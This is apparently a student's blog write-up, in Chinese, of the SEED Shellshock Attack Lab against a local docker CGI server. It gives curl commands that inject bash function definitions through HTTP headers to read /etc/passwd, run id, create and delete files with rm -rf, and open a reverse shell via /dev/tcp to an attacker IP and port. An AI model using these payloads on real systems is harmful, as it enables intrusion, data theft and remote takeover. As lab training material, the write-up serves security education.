SEED 2.0 Softwarelab2:Shellshock Attack Lab

软件安全
Word count: 787   |   Reading time≈ 3 min

Shellshock Attack Lab

Overview

shellshock漏洞可以利用很多系统,它可以被远程或者本地一个机器启动。

本实验包含以下几个主题:

  • Shellshock
  • 环境变量
  • 在bash中函数的定义
  • Apache和CGI程序

Environment Setup

DNS setting

image-20211027172835071

Container Setup and Commands

运行一个docker容器:

  1. labsetup
    image-20211027174035977
  2. dcbuild
    image-20211027174110640
  3. dcup
    image-20211027174135259
  4. dockps、docksh
    image-20211027174307330

Web Server and CGI

访问服务器的CGI程序:curl http://www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211027175746004

Lab Tasks

Task 1: Experimenting with Bash Function

使用以下命令,看shell是不是有shellshock这个漏洞

1
2
foo="() { echo "hello"; }; echo "extra";"
export foo
  1. 有漏洞版本
    image-20211027180652851
  2. 无漏洞版本
    image-20211027180834121

用上面的命令可以判断shell是否存在shellshock漏洞

Task 2: Passing Data to Bash via Environment Variable

image-20211027182141723

使用curl命令的各个参数去访问这个CGI程序,探究攻击者是如何通过环境变量传递数据到有漏洞的bash中的。

1
2
3
4
curl -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi             //-v显示详情
curl -A "my data" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi
curl -e "my data" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi
curl -H "AAAAAA: BBBBBB" -v www.seedlab-shellshock.com/cgi-bin/getenv.cg

image-20211027182052991

image-20211027182518572

image-20211027182603944

Task 3: Launching the Shellshock Attack

使用三种不同的方法对目标CGI程序实行Shellshock攻击

对于以下四个目标,每种使用一种方法,包括三种不同的方法

Task 3.A: Get the server to send back the content of the /etc/passwd file

echo Content_type: text/plain; echo; /bin/cat /etc/passwd

使用User-Agent字段

curl -A "() { echo hello;}; echo Content_type: text/plain; echo; /bin/cat /etc/passwd" www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211027205745954

Task 3.B: Get the server to tell you its process’ user ID. You can use the /bin/id command to print out the ID information

echo Content_type: text/plain; echo; /bin/id

使用Referer字段

curl -e "() { echo hello;}; echo Content_type: text/plain; echo; /bin/id" www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211027205849559

Task 3.C: Get the server to create a file inside the /tmp folder. You need to get into the container to see whether the file is created or not, or use another Shellshock attack to list the /tmp folder

echo Content_type: text/plain; echo; touch /tmp/task; /bin/ls /tmp/

自己建一个字段使用/bin/rm -r

curl -H "test:() { echo hello;}; echo Content_type: text/plain; echo; /bin/touch /tmp/task;" www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211027224712910

Task 3.D: Get the server to delete the file that you just created inside the /tmp folder.

echo Content_type: text/plain; echo; rm -rf /tmp/task

curl -H "test:() { echo hello;}; echo Content_type: text/plain; echo; /bash/rm -rf /tmp/task" www.seedlab-shellshock.com/cgi-bin/vul.cgi

image-20211027224926617

Question

  1. 能否通过此漏洞查看 /etc/shadow 的内容?
    不能,从Task 3.B中我们知道我们只有www-data用户权限,这个需要root权限
  2. 能否通过GET方法通过QUERY-STRING环境变量实现Shellshock攻击
    curl "www.seedlab-shellshock.com/cgi-bin/vul.cgi/?() { echo hello;}; echo Content_type: text/plain; echo; /bin/cat /etc/passwd我觉得不行,因为GET方法?之后的参数无法被解析

Task 4: Getting a Reverse Shell via Shellshock Attack

创建反向shell方便执行任意代码

  1. 打开攻击者9090端口监听
    image-20211028113714607
  2. 实行shellshock攻击
    curl -A "() { echo hello;}; echo Content_type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/192.168.37.132/9090 0<&1 2>&1" http://10.9.0.80/cgi-bin/vul.cgi
    image-20211028113846892
  3. 然后成功
    image-20211028113910152

Task 5: Using the Patched Bash

用修补后的bash重做task 3,修改为/bin/bash

image-20211028125625400

重新攻击,输出hell world

  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
  • Copyrights © 2021 Sung
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信